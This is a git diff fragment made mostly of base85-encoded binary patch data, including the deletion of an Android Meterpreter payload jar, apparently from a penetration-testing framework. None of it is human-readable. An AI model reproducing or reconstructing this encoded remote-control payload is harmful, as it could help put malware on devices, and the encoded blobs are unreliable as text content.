zpU`n^OmxgeIyOZ$?KIYsa_;tX@B03SX^@V^_r)|RlkaAbbGH|%SY*C)e=IQ;i=<-O
z5`D&j7WCU&_10~@3;8MNvF$ef<0FBdhtC<{ap-wk5q1L415ZH4_a64S(3y%wzuT3H
z#lNGaVm<Tsjm2(k=z72N{#Z|HDHcyH$D*k#2zfcCrFiZ#?%Tk#s6Y%)g3KSxwRPWL
zq$C#E9g9BO{eY{@h|fJT^wc)}@xT)Ev#D!n6}w~vf>&X`iV{x$9XzNDdIP#Mph@tn
zpnF083YrJikoO#@g}!;Ns+jlay&1SS1OFd05Z7+!$t`FV@7p-O<=*r#=pckWpuB?-
zH-qQ>i!aaIKe=yU8z|F<cY+@5J8EB&_XQ~U`o0WgS69JvpW?nm`cg>w22K8FK;A?6
zK8$x!d7t3k%YHrzT*du@`zvE{?;}7Y`@oT0W{m#@cxP7d1B~&<z}JAwz&`@t1ik~@
zz>X8ZJ-c>&CXw8;@8Fiips_u%t$zT&{_TlmrD|90qHQ|%mOG7jUyyn8p2RS47L(<o
zl^8Gv2B<WgyyI3~^RO_i*^)Cm9Z<I_jJ)aOg@M4-1dU436$UPx_^+1bt<bRZ*@>z-
zZHs0ro44SNYic2DR;%W$FnE%yHe#96g`6-Z%ZP$MLk10k;f5&;ylYI`B`8Z}*ES|g
zM_^U7K6%uxI)!qHN&jcSnjo@HSR=$6A<s2a>&cqJG)p@T#zfYR0@@N-1FSE`V@(l9
z(N=oKBR&S?eAAA#OJwb~+Of8t0xCP!JaK1e$GT=L+VMLDeJMKu8zO620c(=Bp8_g7
zK4ZikRD?h~0>5+6ZX0kfIv{>kB?lQ@$fiQdahyY<#AKTtRPs9s#k6bv)<YdZrSKKB
zdGAO1!8av5bR3@oWoJXc=aF`N_Ey0t9c@(#-$I*nLOb~l3U=#gGY<lN82=cMKD6Vv
zffXdt8c(&4x7cw{T7?~N)e4l|X$Vw2kpP2<RXW<L_V>_c|Lj*w0M!D3Cn&q`qs@5z
p6ar}X>7Xh9sUw~R@;iuvVc2n>QlR3|mVGMtGVCrW29$cjKLO5gy%hie

diff --git a/data/android/meterpreter.jar b/data/android/meterpreter.jar
deleted file mode 100644
index b1efa838202e54ff13cdf3378d06e57dc12aff84..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 42817
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
